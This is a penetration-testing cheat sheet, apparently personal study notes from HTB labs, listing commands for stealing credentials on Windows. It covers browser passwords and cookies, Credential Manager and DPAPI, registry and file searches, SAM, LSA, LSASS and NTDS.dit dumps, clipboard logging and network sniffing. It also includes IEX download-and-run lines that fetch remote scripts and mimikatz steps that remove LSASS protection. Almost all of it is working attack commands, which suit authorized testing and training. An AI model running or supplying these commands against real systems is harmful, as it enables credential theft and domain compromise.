> For the complete documentation index, see [llms.txt](https://intrusionz3r0.gitbook.io/intrusionz3r0/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://intrusionz3r0.gitbook.io/intrusionz3r0/windows-penetration-testing/credentials-attacks-on-windows.md).

# Credentials Attacks On Windows

## Web Credentials

```powershell
PS C:\> start lazagne.exe all
PS C:\> .\\SharpChrome.exe logins /unprotect


PS C:\> vaultcmd /list
PS C:\> vaultcmd /listcreds:"Web Credentials" /all

#-----------EDGE---------------------------------
#Extract credentials from Edge Browswer
PS C:\> (Get-Content "C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz dpapi::chrome /in:"C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" /encryptedkey:<SNIF>e4x8+n0VDX82CffsyVmOzvSraXQ== /unprotect

#-----------Firefox-------------------------------
#Extract passwords from profiles of Mozilla
Intrusionz3r0@htb[/htb]$ python firefox_decrypt.py /folder/containing/profiles.ini/

#Cookies
#Path: %APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
Intrusionz3r0@htb[/htb]$ python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d

#---------Chromium--------------------------------
PS C:\> (Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz  dpapi::chrome /in:"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /encryptedkey:[EncryptedKey] /unprotect

#Cookies
#Path: %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies
PS C:\> IEX(New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\> copy "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cookies"
PS C:\> Invoke-SharpChromium -Command "cookies slack.com"
```

## Credentials manager

```powershell
#Listing Saved Credentials
PS C:\> cmdkey /list

#Enumerate windows credentials
PS C:\> vaultcmd /listcreds:"Windows Credentials" /all

PS C:\> C:\Temp>SharpDPAPI.exe machinecredentials

#Find credentials store
PS C:\> C:\Users\<user>\AppData\Roaming\Microsoft\Protect\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx/556a2412-xxxx-4ccf-b721-e6a0b4f90407

#1. Decrypt master key
mimikatz \"dpapi::masterkey /in:C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx\\556a2412-xxxx-4ccf-b721-e6a0b4f90407 /password:MYPASSWORD123 /protected \" exit

#2. Extract credentials
mimikatz \"dpapi::cred /in:C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Credentials\\C8XXXXXXXXXXXXXXXXXXXXXXXX1B9 /masterkey:d9a<SNIF>f319e9c84
```

## DPAPI

<pre class="language-sh"><code class="lang-sh">#Using Donpapi (best options)
donpapi collect -u 'John.ford' -H 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' --collectors All --target vdixx.eu-xxxx.vl -d eu-xxxx.vl --dc-ip xx.xx.xx.xx

#Using netexec
<strong>Intrusionz3r0@htb[/htb]$ nxc smb &#x3C;ip> -u user -p password --dpapi
</strong>Intrusionz3r0@htb[/htb]$ nxc smb &#x3C;ip> -u user -p password --dpapi cookies
<strong>Intrusionz3r0@htb[/htb]$ nxc smb &#x3C;ip> -u user -p password --dpapi nosystem
</strong>Intrusionz3r0@htb[/htb]$ nxc smb &#x3C;ip> -u user -p password --local-auth --dpapi nosystem
</code></pre>

## Search Credentials

### Extract credentials using SessionGopher

```powershell
PS C:\\htb> Import-Module .\\SessionGopher.ps1
PS C:\\Tools> Invoke-SessionGopher -Target WINLPE-SRV01
```

### Sniff passwords and hashes  with net-creds

```sh
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py -i eth0
```

### Search credentials on the registry

```powershell
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### Search for file contents

```powershell
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
findstr /spin "password" *.*
dir | select-string "password"
PS C:\\htb> Get-ChildItem -Path C:\\PSTranscripts -Force -Recurse -Include *.txt, *.cfg, *.conf, *.xml, *.ini -Exclude "Windows","Documents*", "Program F*" -ErrorAction SilentlyContinue
PS C:\\htb> Get-ChildItem -Path "C:\\Users" -Recurse -File | Select-String -Pattern "password" | Select-Object FileName, LineNumber, Line
```

### Search for filename

```powershell
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
C:\\htb> dir \\confidentials.txt /s /p
PS C:\\htb> Get-ChildItem -Path C:\\ -Filter "confidentials.txt" -Recurse
```

### Passwords in unattend.xml

```sh
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```

### Retrieve Putty Credentials from registry

```powershell
PS C:\\htb> reg query HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions
PS C:\\htb> reg query HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions\\<value>
```

## PowerShell&#x20;

### Powershell History File

<pre class="language-powershell"><code class="lang-powershell"><strong>PS C:\> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
</strong>PS C:\> type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\> cat (Get-PSReadlineOption).HistorySavePath
</code></pre>

### Powershell Transcript <a href="#powershell-transcript" id="powershell-transcript"></a>

```powershell
PS C:\> gc C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
PS C:\> gc C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
```

### **Recover credentials on PowerShell scripts**

**First Option:**

```bash
PS C:\\htb> $credential = Import-Clixml -Path 'C:\\scripts\\pass.xml'
PS C:\\htb> $credential.GetNetworkCredential().username
PS C:\\htb> $credential.GetNetworkCredential().password
Str0ng3ncryptedP@ss!
```

**Second Option**

<pre class="language-powershell"><code class="lang-powershell">PS C:\> $user = "Administrator"
<strong>PS C:\> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
</strong>PS C:\> cred = New-Object System.Management.Automation.PSCredential($user, $pass)
PS C:\> $cred.GetNetworkCredential() | Format-List
</code></pre>

## Alternate Data Stream <a href="#password-in-alternate-data-stream" id="password-in-alternate-data-stream"></a>

### Retrieve Credentials on data streams

```powershell
PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag
```

## Clipboard

### Monitor Clipboard

```powershell
PS C:\\htb> IEX(New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1>')
PS C:\\htb> Invoke-ClipboardLogger
```

## **Sensitive Files**

### IIS Web config <a href="#iis-web-config" id="iis-web-config"></a>

```powershell
PS C:\> Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
```

### Retrieve password from Wireless

```powershell
C:\\htb> netsh wlan show profile
C:\\htb> netsh wlan show profile <ssid-name> key=clear

cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
```

## Sticky notes

```powershell
#Path: C:\\Users\\<user>\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite
Intrusionz3r0@htb[/htb]$ sqlite3 plum.sqlite "select Text from Note;"
Intrusionz3r0@htb[/htb]$ strings plum.sqlite-wal

PS C:\\htb> Set-ExecutionPolicy Bypass -Scope Process
PS C:\\htb> cd .\\PSSQLite\\
PS C:\\htb> Import-Module .\\PSSQLite.psd1
PS C:\\htb> $db = 'C:\\Users\\htb-student\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite'
PS C:\\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
```

### **Copying SAM SYSTEM and Security**

```bash
C:\\WINDOWS\\system32> reg.exe save hklm\\sam C:\\sam.save
C:\\WINDOWS\\system32> reg.exe save hklm\\system C:\\system.save
C:\\WINDOWS\\system32> reg.exe save hklm\\security C:\\security.save
```

### **Dumping SAM and SYSTEM**

<pre class="language-bash"><code class="lang-bash">Intrusionz3r0X@htb[/htb]$ impacket-reg domain/domuser:'Password'@192.168.210.16  save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.3\smbfolder'
<strong>Intrusionz3r0X@htb[/htb]$ impacket-secretsdump -sam sam.save -system system.save LOCAL 
</strong>Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --sam
</code></pre>

### Dump LSA

```bash
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --lsa
```

### Dump lsass

```bash
#Finding LSASS PID in cmd
C:\\Windows\\system32> tasklist /svc

#Finding LSASS PID in Powershell
PS C:\\Windows\\system32>  Get-Process lsass
#----------------------------------------

#Create lssas file
PS C:\\Windows\\system32> rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full

#dump the lsass.dmp file.
Intrusionz3r0X@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp 
C:\\Windows\\system32>  .\\mimikatz.exe privilege::debug "sekurlsa::logonpasswords full" exit

```

#### Dump lsass using RDP session

<figure><img src="/files/iFsCKpNgySJK990A080N" alt=""><figcaption></figcaption></figure>

### Dump NTDS.dit

To make a copy of the NTDS.dit file, we need local admin (`Administrators group`) or Domain Admin (`Domain Admins group`) (or equivalent) rights.

```bash

#List the localgroups
C:\\> net localgroup

#Check user permission.
C:\\> net user bwilliamson

#Check the shadow copy
C:\\> vssadmin CREATE SHADOW /For=C:

#Move the file.
C:\\> cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit

#Extracting Credentials from NTDS.dit
PS C:\\htb> Import-Module .\\DSInternals.psd1
PS C:\\htb> $key = Get-BootKey -SystemHivePath .\\SYSTEM
PS C:\\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\\ntds.dit -BootKey $key

#Extracting Hashes Using SecretsDump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

# Fastest way to steal the NTDS.
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds
```

## Mimikatz

```sh
# Dump the local SAM database 
mimikatz lsadump::sam

#Dump LSA 
mimikatz lsadump::lsa /inject

#Dump secrets
mimikatz lsadump::secrets

# Dump the logon passwords
mimikatz sekurlsa::logonpasswords

# Dump the encryption keys used by Kerberos.
mimikatz sekurlsa::ekeys

# Dump Domain Cached Credentials
mimikatz lsadump::cache

#Dump secrets trust
mimikatz lsadump::sam
```

#### **Bypassing LSA protection**&#x20;

**Error:** `ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)`&#x20;

```
!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords
```

<figure><img src="/files/6S2hFPQ8Kg7JccWT9QlD" alt=""><figcaption></figcaption></figure>
